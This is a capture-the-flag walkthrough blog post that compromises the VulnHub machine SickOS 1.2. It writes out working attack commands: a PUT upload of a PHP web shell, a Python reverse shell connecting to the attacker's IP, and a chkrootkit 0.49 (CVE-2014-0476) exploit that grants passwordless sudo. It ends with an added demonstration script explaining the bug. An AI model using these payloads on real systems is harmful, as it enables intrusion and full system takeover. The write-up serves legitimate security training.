Capture the flag (CTF)

SickOS 1.2: Walkthrough

May 11, 2017 by Chiragh Dewan

SickOS 1.2 surfaced on VulnHub on April 21st, 2016. Created by D4rk, it can be found at https://www.vulnhub.com/entry/sickos-12,144/. It is the second machine in the SickOS series. The box runs Ubuntu, and the objective is to read the contents of /root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt.

For the attacking machine, I will be using Kali 2017.1.

Once booted, this is what the machine looks like:

We start the attack by finding the IP of the victim machine by using the netdiscover command:

$ netdiscover

Now that we know the target IP, let us scan its ports to learn more about the services it exposes:

The scan shows us that the following ports are open:

  • Port 22 – Running OpenSSH
  • Port 80 – Running lighttpd

Let us head over to the browser to see if we find something useful:

After going through the source code of the page, I do not find anything useful. Let us fire up dirbuster to see if the server is hiding anything from us:

The results quickly show a /test/ directory:

Browsing to it shows an empty directory listing.

Since dirbuster has not turned up anything else so far, let us see what this directory will let us do. A cURL OPTIONS request tells us which HTTP methods the server accepts for it (look at the Allow header in the response):

$ curl -v -X OPTIONS http://172.16.92.137/test

Well, that is interesting! The Allow header shows that the PUT method is permitted on this URL, meaning we can create a new resource there:

$ curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://172.16.92.137/test/shell.php

The request creates shell.php in the /test/ directory containing our PHP one-liner, which runs whatever we pass in the cmd parameter and gives us a command line on the server:

That gives us command execution through the browser, which is half the job. Now let us turn it into a reverse shell:

I will be using the following Python reverse shell (more can be found at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet ):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.92.133",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now start a listener on port 443 on the attacking machine and pass the URL-encoded shell command to the webshell we just uploaded:

$ curl "http://172.16.92.137/test/shell.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22172.16.92.133%22%2C443))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27"

Note: I tried to use ports 444 and 4444, but it did not work as they are blocked.

Voila, we have a low privilege shell:

Now let us explore the system and see what we can use to escalate to root. After some time, I stumbled upon something really interesting in /etc/cron.daily:

cron.daily holds the jobs that cron runs for the server once a day, and one of them is chkrootkit. On closer examination, the installed chkrootkit is version 0.49!

Version 0.49 has a known local privilege escalation (CVE-2014-0476): a missing pair of quotes in chkrootkit's slapper() check makes it execute /tmp/update, if that file exists and is executable, with the privileges of the user running chkrootkit, which is root when it runs from cron.daily. I used the following exploit: https://www.exploit-db.com/exploits/33899/

$ echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

This creates the file /tmp/update. Make it executable so that chkrootkit can run it (the exploit only needs the execute bit, so chmod +x would be enough):

$ chmod 777 /tmp/update

Once done, wait a couple of minutes for the cron job to run chkrootkit, and then type:

$ sudo su

Now we have root! Let us head over to /root and read the flag, 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt.
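Why the /tmp/update trick works, as an added example that is not part of the original walkthrough and is not the chkrootkit source itself: the two loops below paraphrase the file-check loop in chkrootkit 0.49's slapper() function and the quoted version that fixed it, with a shortened file list. The planted file is a harmless stand-in for the sudoers payload, it is written into a scratch directory instead of /tmp, and it records which user ran it; the function and variable names other than file_port are my own.

```shell
#!/bin/sh
# Added example, not from the walkthrough or from chkrootkit: the shell bug behind
# exploit 33899 (CVE-2014-0476), reproduced in a scratch directory with a marker file
# instead of a sudoers edit. Loops paraphrase chkrootkit 0.49's slapper() and the 0.50 fix.

# Vulnerable 0.49 pattern. With $file_port empty, the unquoted line
#     file_port=$file_port $i
# is parsed by the shell as "run the command $i with file_port= in its environment".
# Because cron runs chkrootkit as root, a planted, executable /tmp/update runs as root.
vulnerable_slapper_check() {
    scan_dir=$1
    file_port=
    for i in "$scan_dir/.bugtraq" "$scan_dir/httpd" "$scan_dir/update" "$scan_dir/.cinik"; do
        if [ -f "$i" ]; then
            file_port=$file_port $i      # BUG: executes $i instead of appending it
        fi
    done
}

# Fixed 0.50 pattern: the quotes make this a plain string append, so $i is never executed.
fixed_slapper_check() {
    scan_dir=$1
    file_port=
    for i in "$scan_dir/.bugtraq" "$scan_dir/httpd" "$scan_dir/update" "$scan_dir/.cinik"; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"
        fi
    done
    printf '%s\n' "$file_port"         # the list of suspicious files chkrootkit would report
}

# Plant a stand-in for /tmp/update in $1 that records which user ran it.
plant_update() {
    printf '#!/bin/sh\nid -un > "%s/marker"\n' "$1" > "$1/update"
    chmod 755 "$1/update"             # chkrootkit can only run it if it is executable,
                                      # hence the walkthrough's chmod 777 /tmp/update
}

# Run one checker against a fresh scratch dir and print "executed" or "not-executed".
run_trial() {
    dir=$(mktemp -d "${TMPDIR:-/tmp}/slapper.XXXXXX")
    plant_update "$dir"
    "$1" "$dir" >/dev/null 2>&1
    if [ -f "$dir/marker" ]; then result=executed; else result=not-executed; fi
    rm -rf "$dir"
    printf '%s\n' "$result"
}

echo "chkrootkit 0.49 pattern: planted update was $(run_trial vulnerable_slapper_check)"
echo "chkrootkit 0.50 pattern: planted update was $(run_trial fixed_slapper_check)"
```

Run as an unprivileged user the marker simply contains that user's name; on the box the same line runs inside root's cron job, which is why a world-writable /tmp/update containing a sudoers edit is enough. The same unquoted-assignment pattern is worth grepping for in any shell script that runs as root over attacker-controlled file names.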

A creative problem-solving full-stack web developer with expertise in Information Security Audit, Web Application Audit, Vulnerability Assessment, Penetration Testing/Ethical Hacking, as well as previous experience in Artificial Intelligence, Machine Learning, and Natural Language Processing. He has also been recognised by various companies such as Facebook, Google, Microsoft, PayPal, Netflix, Blackberry, etc. for reporting various security vulnerabilities. He has also given various talks on Artificial Intelligence and Cyber Security, including at a TEDx event.
